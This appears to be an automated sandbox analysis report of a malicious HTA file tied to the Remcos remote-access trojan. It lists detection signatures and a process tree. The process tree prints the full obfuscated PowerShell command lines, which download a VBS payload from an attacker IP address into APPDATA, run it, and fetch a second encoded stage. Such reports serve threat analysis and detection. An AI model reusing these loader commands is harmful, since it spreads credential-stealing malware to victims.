Analysis Overview
SHA256
af3d6095ad1ce9cc31549c93bf7858e2989d725e2c7a34adb975b76c09bac8ba
Threat Level: Known bad
The file 367299f3b78921590e30252fcc114cc7.hta was found to be: Known bad.
Malicious Activity Summary
Remcos
Credentials from Password Stores: Credentials from Web Browsers
NirSoft MailPassView
NirSoft WebBrowserPassView
Detected Nirsoft tools
Blocklisted process makes network request
Evasion via Device Credential Deployment
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Reads user/profile data of web browsers
Accesses Microsoft Outlook accounts
Suspicious use of SetThreadContext
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious behavior: MapViewOfSection
Modifies Internet Explorer settings
Modifies registry class
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-07 06:53
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-07 06:53
Reported
2024-08-07 06:55
Platform
win7-20240729-en
Max time kernel
19s
Max time network
20s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\367299f3b78921590e30252fcc114cc7.hta"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" "/c poWERshelL.exe -Ex BypasS -noP -W 1 -c DeVIcecreDENTIAldePlOYmeNt ; iEx($(IEx('[SYsteM.TExT.eNcodiNg]'+[chaR]0x3A+[ChAr]0X3A+'UtF8.GeTstRinG([sYStEM.convERt]'+[CHaR]0x3A+[cHAr]0x3a+'froMBASe64sTRIng('+[chAr]34+'JDAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYkVSZEVGaW5JdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cVZsSmJiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUVRyUCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeXYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuQ1JscyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaURCcnMpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIk9yaiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB6YlhvVEFTVEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTczLjE5Mi4xMzUvODgva2lkc3Jvc2VmYWNpbmdpbWFnZXN0cmlja2luZy5nSUYiLCIkZW52OkFQUERBVEFca2lkc3Jvc2VmYWNpbmdpbWFnZXN0cmlja2luLnZCUyIsMCwwKTtTVEFydC1zTGVlUCgzKTtTVGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGtpZHNyb3NlZmFjaW5naW1hZ2VzdHJpY2tpbi52QlMi'+[chAR]34+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
poWERshelL.exe -Ex BypasS -noP -W 1 -c DeVIcecreDENTIAldePlOYmeNt ; iEx($(IEx('[SYsteM.TExT.eNcodiNg]'+[chaR]0x3A+[ChAr]0X3A+'UtF8.GeTstRinG([sYStEM.convERt]'+[CHaR]0x3A+[cHAr]0x3a+'froMBASe64sTRIng('+[chAr]34+'JDAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYkVSZEVGaW5JdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cVZsSmJiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUVRyUCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeXYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuQ1JscyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaURCcnMpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIk9yaiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB6YlhvVEFTVEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTczLjE5Mi4xMzUvODgva2lkc3Jvc2VmYWNpbmdpbWFnZXN0cmlja2luZy5nSUYiLCIkZW52OkFQUERBVEFca2lkc3Jvc2VmYWNpbmdpbWFnZXN0cmlja2luLnZCUyIsMCwwKTtTVEFydC1zTGVlUCgzKTtTVGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGtpZHNyb3NlZmFjaW5naW1hZ2VzdHJpY2tpbi52QlMi'+[chAR]34+'))')))"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5r1u6emx.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES64FB.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC64FA.tmp"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\kidsrosefacingimagestrickin.vBS"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J≩ ⫻ ㏤ ≪ ㏴Bs≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴bgBr≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴PQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴a≩ ⫻ ㏤ ≪ ㏴B0≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴c≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴6≩ ⫻ ㏤ ≪ ㏴C8≩ ⫻ ㏤ ≪ ㏴LwBz≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴cgB2≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bv≩ ⫻ ㏤ ≪ ㏴HI≩ ⫻ ㏤ ≪ ㏴dwBp≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bv≩ ⫻ ㏤ ≪ ㏴Hc≩ ⫻ ㏤ ≪ ㏴cw≩ ⫻ ㏤ ≪ ㏴u≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bu≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴LgBj≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴bQ≩ ⫻ ㏤ ≪ ㏴u≩ ⫻ ㏤ ≪ ㏴GI≩ ⫻ ㏤ ≪ ㏴cg≩ ⫻ ㏤ ≪ ㏴v≩ ⫻ ㏤ ≪ ㏴EY≩ ⫻ ㏤ ≪ ㏴aQBs≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴cw≩ ⫻ ㏤ ≪ ㏴v≩ ⫻ ㏤ ≪ ㏴HY≩ ⫻ ㏤ ≪ ㏴YgBz≩ ⫻ ㏤ ≪ ㏴C4≩ ⫻ ㏤ ≪ ㏴agBw≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴Zw≩ ⫻ ㏤ ≪ ㏴n≩ ⫻ ㏤ ≪ ㏴Ds≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴Hc≩ ⫻ ㏤ ≪ ㏴ZQBi≩ ⫻ ㏤ ≪ ㏴EM≩ ⫻ ㏤ ≪ ㏴b≩ ⫻ ㏤ ≪ ㏴Bp≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴bgB0≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴PQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴E4≩ ⫻ ㏤ ≪ ㏴ZQB3≩ ⫻ ㏤ ≪ ㏴C0≩ ⫻ ㏤ ≪ ㏴TwBi≩ ⫻ ㏤ ≪ ㏴Go≩ ⫻ ㏤ ≪ ㏴ZQBj≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴BT≩ ⫻ ㏤ ≪ ㏴Hk≩ ⫻ ㏤ ≪ ㏴cwB0≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴bQ≩ ⫻ ㏤ ≪ ㏴u≩ ⫻ ㏤ ≪ ㏴E4≩ ⫻ ㏤ ≪ ㏴ZQB0≩ ⫻ ㏤ ≪ ㏴C4≩ ⫻ ㏤ ≪ ㏴VwBl≩ ⫻ ㏤ ≪ ㏴GI≩ ⫻ ㏤ ≪ ㏴QwBs≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴ZQBu≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴Ow≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴cgB5≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴ew≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bv≩ ⫻ ㏤ ≪ ㏴Hc≩ ⫻ ㏤ ≪ ㏴bgBs≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴YQBk≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴BE≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bh≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴PQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴dwBl≩ ⫻ ㏤ ≪ ㏴GI≩ ⫻ ㏤ ≪ ㏴QwBs≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴ZQBu≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴LgBE≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴dwBu≩ ⫻ ㏤ ≪ ㏴Gw≩ ⫻ ㏤ ≪ ㏴bwBh≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴R≩ ⫻ ㏤ ≪ ㏴Bh≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴YQ≩ ⫻ ㏤ ≪ ㏴o≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴b≩ ⫻ ㏤ ≪ ㏴Bp≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴aw≩ ⫻ ㏤ ≪ ㏴p≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴fQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴GM≩ ⫻ ㏤ ≪ ㏴YQB0≩ ⫻ ㏤ ≪ ㏴GM≩ ⫻ ㏤ ≪ ㏴a≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Hs≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴BX≩ ⫻ ㏤ ≪ ㏴HI≩ ⫻ ㏤ ≪ ㏴aQB0≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴LQBI≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴cwB0≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴JwBG≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴aQBs≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴FQ≩ ⫻ ㏤ ≪ ㏴bw≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴bwB3≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴b≩ ⫻ ㏤ ≪ ㏴Bv≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴YQB0≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴Bm≩ ⫻ ㏤ ≪ ㏴HI≩ ⫻ ㏤ ≪ ㏴bwBt≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴J≩ ⫻ ㏤ ≪ ㏴Bs≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴bgBr≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴t≩ ⫻ ㏤ ≪ ㏴EY≩ ⫻ ㏤ ≪ ㏴bwBy≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴ZwBy≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴dQBu≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴QwBv≩ ⫻ ㏤ ≪ ㏴Gw≩ ⫻ ㏤ ≪ ㏴bwBy≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴UgBl≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴Ow≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴e≩ ⫻ ㏤ ≪ ㏴Bp≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴B9≩ ⫻ ㏤ ≪ ㏴Ds≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴Bp≩ ⫻ ㏤ ≪ ㏴GY≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴o≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bv≩ ⫻ ㏤ ≪ ㏴Hc≩ ⫻ ㏤ ≪ ㏴bgBs≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴YQBk≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴BE≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bh≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴LQBu≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴dQBs≩ ⫻ ㏤ ≪ ㏴Gw≩ ⫻ ㏤ ≪ ㏴KQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Hs≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴bQBh≩ ⫻ ㏤ ≪ ㏴Gc≩ ⫻ ㏤ ≪ ㏴ZQBU≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴e≩ ⫻ ㏤ ≪ ㏴B0≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴PQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Fs≩ ⫻ ㏤ ≪ ㏴UwB5≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴G0≩ ⫻ ㏤ ≪ ㏴LgBU≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴e≩ ⫻ ㏤ ≪ ㏴B0≩ ⫻ ㏤ ≪ ㏴C4≩ ⫻ ㏤ ≪ ㏴RQBu≩ ⫻ ㏤ ≪ ㏴GM≩ ⫻ ㏤ ≪ ㏴bwBk≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴bgBn≩ ⫻ ㏤ ≪ ㏴F0≩ ⫻ ㏤ ≪ ㏴Og≩ ⫻ ㏤ ≪ ㏴6≩ ⫻ ㏤ ≪ ㏴FU≩ ⫻ ㏤ ≪ ㏴V≩ ⫻ ㏤ ≪ ㏴BG≩ ⫻ ㏤ ≪ ㏴Dg≩ ⫻ ㏤ ≪ ㏴LgBH≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴BT≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴cgBp≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Zw≩ ⫻ ㏤ ≪ ㏴o≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bv≩ ⫻ ㏤ ≪ ㏴Hc≩ ⫻ ㏤ ≪ ㏴bgBs≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴YQBk≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴BE≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bh≩ ⫻ ㏤ ≪ ㏴Ck≩ ⫻ ㏤ ≪ ㏴Ow≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴cwB0≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴cgB0≩ ⫻ ㏤ ≪ ㏴EY≩ ⫻ ㏤ ≪ ㏴b≩ ⫻ ㏤ ≪ ㏴Bh≩ ⫻ ㏤ ≪ ㏴Gc≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴9≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴Jw≩ ⫻ ㏤ ≪ ㏴8≩ ⫻ ㏤ ≪ ㏴Dw≩ ⫻ ㏤ ≪ ㏴QgBB≩ ⫻ ㏤ ≪ ㏴FM≩ ⫻ ㏤ ≪ ㏴RQ≩ ⫻ ㏤ ≪ ㏴2≩ ⫻ ㏤ ≪ ㏴DQ≩ ⫻ ㏤ ≪ ㏴XwBT≩ ⫻ ㏤ ≪ ㏴FQ≩ ⫻ ㏤ ≪ ㏴QQBS≩ ⫻ ㏤ ≪ ㏴FQ≩ ⫻ ㏤ ≪ ㏴Pg≩ ⫻ ㏤ ≪ ㏴+≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴Ow≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴ZQBu≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴RgBs≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴Zw≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴D0≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴n≩ ⫻ ㏤ ≪ ㏴Dw≩ ⫻ ㏤ ≪ ㏴P≩ ⫻ ㏤ ≪ ㏴BC≩ ⫻ ㏤ ≪ ㏴EE≩ ⫻ ㏤ ≪ ㏴UwBF≩ ⫻ ㏤ ≪ ㏴DY≩ ⫻ ㏤ ≪ ㏴N≩ ⫻ ㏤ ≪ ㏴Bf≩ ⫻ ㏤ ≪ ㏴EU≩ ⫻ ㏤ ≪ ㏴TgBE≩ ⫻ ㏤ ≪ ㏴D4≩ ⫻ ㏤ ≪ ㏴Pg≩ ⫻ ㏤ ≪ ㏴n≩ ⫻ ㏤ ≪ ㏴Ds≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bh≩ ⫻ ㏤ ≪ ㏴HI≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴BJ≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴Hg≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴9≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴J≩ ⫻ ㏤ ≪ ㏴Bp≩ ⫻ ㏤ ≪ ㏴G0≩ ⫻ ㏤ ≪ ㏴YQBn≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴V≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴Hg≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴u≩ ⫻ ㏤ ≪ ㏴Ek≩ ⫻ ㏤ ≪ ㏴bgBk≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴e≩ ⫻ ㏤ ≪ ㏴BP≩ ⫻ ㏤ ≪ ㏴GY≩ ⫻ ㏤ ≪ ㏴K≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bh≩ ⫻ ㏤ ≪ ㏴HI≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴BG≩ ⫻ ㏤ ≪ ㏴Gw≩ ⫻ ㏤ ≪ 